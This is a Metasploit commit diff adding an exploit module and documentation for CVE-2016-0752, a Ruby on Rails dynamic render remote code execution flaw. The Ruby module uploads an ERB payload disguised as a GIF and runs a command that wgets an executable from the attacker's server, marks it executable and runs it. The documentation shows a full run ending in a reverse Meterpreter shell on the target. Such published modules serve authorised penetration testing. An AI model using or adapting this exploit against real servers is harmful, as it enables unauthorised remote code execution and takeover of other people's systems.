Land rapid7#7429, Ruby on Rails Dynamic Render File Upload Remote Code Exec

wchen-r7 · wchen-r7 · commit 9e97febcd11a · 2016-10-13T11:45:46.000-05:00
diff --git a/documentation/modules/exploit/linux/http/rails_dynamic_render_code_exec.md b/documentation/modules/exploit/linux/http/rails_dynamic_render_code_exec.md
@@ -0,0 +1,79 @@
+## Intro
+
+Rails is a web application development framework written in the Ruby language. It is designed to make programming web applications easier by making assumptions about what every developer needs to get started. It allows you to write less code while accomplishing more than many other languages and frameworks.
+
+http://rubyonrails.org/
+
+> This module exploits the rendering vulnerability via a temporary file upload to pop a shell (CVE-2016-0752).
+
+## Setup
+
+**Download and setup the sample vuln application:**
+
+- [ ] `sudo apt-get install -y curl git`
+- [ ] `curl -L https://get.rvm.io | bash -s stable --autolibs=3 --ruby=2.3.1`
+- [ ] `source ~/.rvm/scripts/rvm`
+- [ ] `sudo apt-get install rubygems ruby-dev nodejs zlib1g-dev -y`
+- [ ] `gem install rails -v 4.0.8`
+- [ ] `git clone https://github.com/forced-request/rails-rce-cve-2016-0752 pwn`
+- [ ] `cd pwn`
+- [ ] `bundle install`
+- [ ] Edit the config/routes.rb file and add `post "users/:id", to: 'user#show'`
+
+Basically, you just need a POST endpoint for the temporary file upload trick. Now you can start the rails server and test the module.
+
+- [ ] `rails s -b 0.0.0.0` or `rails s -b 0.0.0.0 -e production`
+
+## Usage
+
+### Typical Usage
+
+Just set ```RHOST``` and fire off the module! It's pretty much painless.
+```set VERBOSE true``` if you want to see details.
+
+```
+saturn:metasploit-framework mr_me$ cat scripts/rails.rc 
+use exploit/multi/http/rails_dynamic_render_code_exec
+set RHOST 172.16.175.251
+set payload linux/x86/meterpreter/reverse_tcp
+set LHOST 172.16.175.1
+check
+exploit
+
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/rails.rc 
+[*] Processing scripts/rails.rc for ERB directives.
+resource (scripts/rails.rc)> use exploit/multi/http/rails_dynamic_render_code_exec
+resource (scripts/rails.rc)> set RHOST 172.16.175.251
+RHOST => 172.16.175.251
+resource (scripts/rails.rc)> set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+resource (scripts/rails.rc)> set LHOST 172.16.175.1
+LHOST => 172.16.175.1
+resource (scripts/rails.rc)> check
+[+] 172.16.175.251:3000 The target is vulnerable.
+resource (scripts/rails.rc)> exploit
+[*] Exploit running as background job.
+[*] Started reverse TCP handler on 172.16.175.1:4444 
+
+[*] Sending initial request to detect exploitability
+msf exploit(rails_dynamic_render_code_exec) > [*] 172.16.175.251:3000 - Starting up our web service on http://172.16.175.1:1337/iUDaRVpz ...
+[*] Using URL: http://0.0.0.0:1337/iUDaRVpz
+[*] Local IP: http://192.168.100.13:1337/iUDaRVpz
+[*] uploading image...
+[+] injected payload
+[*] 172.16.175.251:3000 - Sending the payload to the server...
+[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+[*] Sending stage (1495599 bytes) to 172.16.175.251
+[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.251:41246) at 2016-09-29 17:52:00 -0500
+[+] Deleted /tmp/NhhGKCCIgwF
+
+msf exploit(rails_dynamic_render_code_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 50809 created.
+Channel 1 created.
+$ id
+uid=1000(student) gid=1000(student) groups=1000(student),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
+$
+```
diff --git a/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb b/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
@@ -0,0 +1,200 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a remote code execution vulnerability in the explicit render
+        method when leveraging user parameters.
+        This module has been tested across multiple versions of Ruby on Rails.
+        The technique used by this module requires the specified
+        endpoint to be using dynamic render paths, such as the following example:
+
+        def show
+          render params[:id]
+        end
+
+        Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
+        can literally be any endpoint. This module doesnt use the log inclusion method of
+        exploitation due to it not being universal enough. Instead, a new code injection
+        technique was found and used whereby an attacker can upload temporary image files
+        against any POST endpoint and use them for the inclusion attack. Finally, you only
+        get one shot at this if you are testing with the builtin rails server, use caution.
+      },
+      'Author'         =>
+        [
+          'mr_me <mr_me@offensive-security.com>',      # necromanced old bug & discovered new vector rce vector
+          'John Poulin (forced-request)'               # original render bug finder
+        ],
+      'References'  =>
+        [
+          [ 'CVE', '2016-0752'],
+          [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'],        # rails patch
+          [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'],  # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
+          [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'],                     # John's original exploit
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'    => ['linux', 'bsd'],
+      'Arch'        => ARCH_X86,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Privileged'     => false,
+      'Targets'     =>
+        [
+          [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ]                                                   # Other versions are also affected
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Oct 16 2016'))
+    register_options(
+      [
+        Opt::RPORT(3000),
+        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
+        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
+      ], self.class)
+  end
+
+  def check
+
+    # this is the check for the dev environment
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], "%2f"),
+      'method'    =>  'GET',
+    }, 60)
+
+    # if the page controller is dynamically rendering, its for sure vuln
+    if res and res.body =~ /render params/
+      return CheckCode::Vulnerable
+    end
+
+    # this is the check for the prod environment
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
+      'method'    =>  'GET',
+    }, 60)
+
+    # if we can read files, its likley we can execute code
+    if res and res.body =~ /ruby/
+      return CheckCode::Appears
+    end
+    return CheckCode::Safe
+  end
+
+  def on_request_uri(cli, request)
+    if (not @pl)
+      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  def send_payload
+    @bd = rand_text_alpha(8+rand(8))
+    fn  = rand_text_alpha(8+rand(8))
+    un  = rand_text_alpha(8+rand(8))
+    pn  = rand_text_alpha(8+rand(8))
+    register_file_for_cleanup("/tmp/#{@bd}")
+    cmd  = "wget #{@service_url} -O /tmp/#{@bd};"
+    cmd << "chmod 755 /tmp/#{@bd};"
+    cmd << "/tmp/#{@bd}"
+    pay = "<%=`#{cmd}`%>"
+    print_status("uploading image...")
+    data = Rex::MIME::Message.new
+    data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'cookie' => @cookie,
+      'uri'    => normalize_uri(datastore['URIPATH'], pn),
+      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+      'data'   => data.to_s
+    })
+    if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)&gt;/
+      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)&gt;/
+      return true
+    else
+
+      # this is where we pull the log file
+      if leak_log
+        return true
+      end
+    end
+    return false
+  end
+
+  def leak_log
+
+    # path to the log /proc/self/fd/7
+    # this bypasses the extension check
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
+      'method'    =>  'GET',
+    }, 60)
+
+    if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
+      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
+      return true
+    end
+    return false
+  end
+
+  def start_http_server
+    @pl = generate_payload_exe
+    @elf_sent = false
+    downfile = rand_text_alpha(8+rand(8))
+    resource_uri = '/' + downfile
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    # do not use SSL for the attacking web server
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+
+    @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
+    service_url_payload = srv_host + resource_uri
+    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
+    }})
+    datastore['SSL'] = true if ssl_restore
+    connect
+  end
+
+  def render_tmpfile
+    @path.gsub!(/\//, '%2f')
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], @path),
+      'method'    =>  'GET',
+    }, 1)
+  end
+
+  def exploit
+      print_status("Sending initial request to detect exploitability")
+      start_http_server
+      if send_payload
+        print_good("injected payload")
+        render_tmpfile
+
+        # we need to delay, for the stager
+        select(nil, nil, nil, 5)
+      end
+  end
+end
